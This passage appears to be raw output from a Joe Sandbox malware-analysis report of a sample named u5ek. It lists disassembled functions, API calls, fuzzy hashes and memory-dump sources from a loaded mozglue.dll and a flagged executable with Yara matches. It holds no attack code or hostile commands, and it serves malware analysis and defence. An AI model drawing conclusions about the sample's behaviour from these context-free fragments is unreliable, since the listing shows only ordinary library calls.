                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: GetCurrentThreadId.KERNEL32 ref: 6BBB9A95
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A9D
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BBB9ACC
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBB9BA7
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BBB9BB8
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BBB9BC9
                                                                                                                                                                                                                                • Part of subcall function 6BBBE8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBE92D
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD1B
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD44
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBDD58
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BBBDBF2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
                                                                                                                                                                                                                              • String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
                                                                                                                                                                                                                              • API String ID: 3378208378-1387374313
                                                                                                                                                                                                                              • Opcode ID: 8f5a3e3d7ec5f3fc028e81699edd02b08914b2cb818a403499f94229859fad0f
                                                                                                                                                                                                                              • Instruction ID: cd688494459a2d5307d11e1991667eb57acdde4519e528df53f29afc7ba5405d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f5a3e3d7ec5f3fc028e81699edd02b08914b2cb818a403499f94229859fad0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF81E1746007848FCB24DF34E490A6AB7E5FF89308F40892CD89A87791DF79E949CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6BBB483A,?), ref: 6BB74ACB
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6BBB483A,?), ref: 6BB74AE0
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(FFFE15BF,?,6BBB483A,?), ref: 6BB74A82
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: mozalloc_abort.MOZGLUE(?), ref: 6BB8CAA2
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6BBB483A,?), ref: 6BB74A97
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(15D4E801,?,6BBB483A,?), ref: 6BB74A35
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6BBB483A,?), ref: 6BB74A4A
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(15D4E824,?,6BBB483A,?), ref: 6BB74AF4
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(FFFE15E2,?,6BBB483A,?), ref: 6BB74B10
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(8E8E0022,?,6BBB483A,?), ref: 6BB74B2C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4251373892-0
                                                                                                                                                                                                                              • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                              • Instruction ID: 9fa82e4bdedf7e619f9e14f5e74a473183b2c80dddea347d5551f9be81e4aadb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6717AB19007869FCB64DF78C4819AAB7F5FF08308B104A3ED56ACB651E735EA55CB80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCABB4
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCABC0
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(BCF32363), ref: 6BBCAC06
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCAC16
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000001), ref: 6BBCAC27
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(BCF32363), ref: 6BBCAC66
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCAD19
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCAD2B
                                                                                                                                                                                                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BBCAD38
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2167474191-0
                                                                                                                                                                                                                              • Opcode ID: 57f5314e6f1bb27938954a2516ff3830bfc0b7b068e654f57446c2a3e21d34b1
                                                                                                                                                                                                                              • Instruction ID: d6662655617bee099d123af15b8d908d22e2c432ffaf63146e9ed682c835a49f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f5314e6f1bb27938954a2516ff3830bfc0b7b068e654f57446c2a3e21d34b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A513474600B458FC724DF25C48876ABBF6FF89314F204A2DD5AA87751EB75E844CB42
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB52
                                                                                                                                                                                                                              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB82
                                                                                                                                                                                                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCB8D
                                                                                                                                                                                                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBA4
                                                                                                                                                                                                                              • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBC4
                                                                                                                                                                                                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCBE9
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 6BBCCBFB
                                                                                                                                                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCC20
                                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BBCBCAE,?,?,6BBBDC2C), ref: 6BBCCC65
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2325513730-0
                                                                                                                                                                                                                              • Opcode ID: 1ae2ef7fef25117ef0ed30fed5b76a5b71473c5ecac56a5e97c400a9ddb2d09e
                                                                                                                                                                                                                              • Instruction ID: 04466ba1778a5d4bfe4cc2d197d8c5fbc0225f94756b3d538f7c4eaaa363faa3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ae2ef7fef25117ef0ed30fed5b76a5b71473c5ecac56a5e97c400a9ddb2d09e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41A434A003498FCB10DF64C899A6E77B9EF59354F054068E50997352DB3AEC41CBE2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BB7BC03
                                                                                                                                                                                                                              • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BB7BD06
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                              • String ID: 0$0$y
                                                                                                                                                                                                                              • API String ID: 2811501404-3020536412
                                                                                                                                                                                                                              • Opcode ID: 77147ed6d427efdd2ec737f9f20a465880c5382ed5f434ad568bff3fcced1925
                                                                                                                                                                                                                              • Instruction ID: e1d3cad980edb556be9b2ca21dd68c595aa8e25aedff0f92b341788a0afa7fc4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77147ed6d427efdd2ec737f9f20a465880c5382ed5f434ad568bff3fcced1925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3961D271A083848FC730DF38C5A1A5FB7E5EF89344F00862EF8A597251DB34D9458B92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(0000000C,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80A72
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80AF5
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80B9F
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80BDB
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80BED
                                                                                                                                                                                                                              • mozalloc_abort.MOZGLUE(alloc overflow,?,6BBDB80C,00000000,?,?,6BB8003B,?), ref: 6BB80C0A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                                                                                                                                                                              • String ID: alloc overflow
                                                                                                                                                                                                                              • API String ID: 1471638834-749304246
                                                                                                                                                                                                                              • Opcode ID: e5b62643f533030d00053f2492eca14e8b419ffd8c81f96839cde40988aecc70
                                                                                                                                                                                                                              • Instruction ID: caec8e35217fdf82e8869f3a043bb3c8d89cfce074b55c906ccfd2988b7da90e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b62643f533030d00053f2492eca14e8b419ffd8c81f96839cde40988aecc70
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA51CFB0A053468FDB24CF28D8C0B6EB3B6FF44388F94496EC85A9B211EB75E544CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • free.MOZGLUE(?,6BBF008B), ref: 6BB77B89
                                                                                                                                                                                                                              • free.MOZGLUE(?,6BBF008B), ref: 6BB77BAC
                                                                                                                                                                                                                                • Part of subcall function 6BB778C0: free.MOZGLUE(?,6BBF008B), ref: 6BB77BCF
                                                                                                                                                                                                                              • free.MOZGLUE(?,6BBF008B), ref: 6BB77BF2
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3977402767-0
                                                                                                                                                                                                                              • Opcode ID: 2d8229859c78af983c4dffcfd227aab8550e9f5a4710838c9667652fff2890d1
                                                                                                                                                                                                                              • Instruction ID: 6ea50c88ec845fe29822075845bf2e4b2d551a175f14b8611f68b926d1266fba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d8229859c78af983c4dffcfd227aab8550e9f5a4710838c9667652fff2890d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EC1C171E011688BEB34AB39CCA4B9DB772EF41314F1006F9D52AA73C1D7B99E848B51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041884F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041886F
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041887F
                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041889C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004188AF
                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00423530), ref: 004188C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                              • String ID: 05B
                                                                                                                                                                                                                              • API String ID: 3470314060-3788103304
                                                                                                                                                                                                                              • Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                              • Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                                                                                                              • Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                              • Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBC124B
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBC1268
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBC12DA
                                                                                                                                                                                                                              • InitializeConditionVariable.KERNEL32(?), ref: 6BBC134A
                                                                                                                                                                                                                              • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BBC138A
                                                                                                                                                                                                                              • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BBC1431
                                                                                                                                                                                                                                • Part of subcall function 6BBB8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8BD5
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBC145A
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBC146C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2803333873-0
                                                                                                                                                                                                                              • Opcode ID: 370d582c6cd3ec156d9989021a65fe724726e2cd4dcf02dfba5a7ccaa874ed74
                                                                                                                                                                                                                              • Instruction ID: eab1b11d61465569e3217378242ba4fca753ff469d9e7e6d853fd1e79c09f0eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 370d582c6cd3ec156d9989021a65fe724726e2cd4dcf02dfba5a7ccaa874ed74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6161CB759047849BDB10CF24D880BAFB7E6FFC6308F04891DE99997212EB39E845CB42
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74C63
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74C89
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CAC
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CCF
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CF2
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74D15
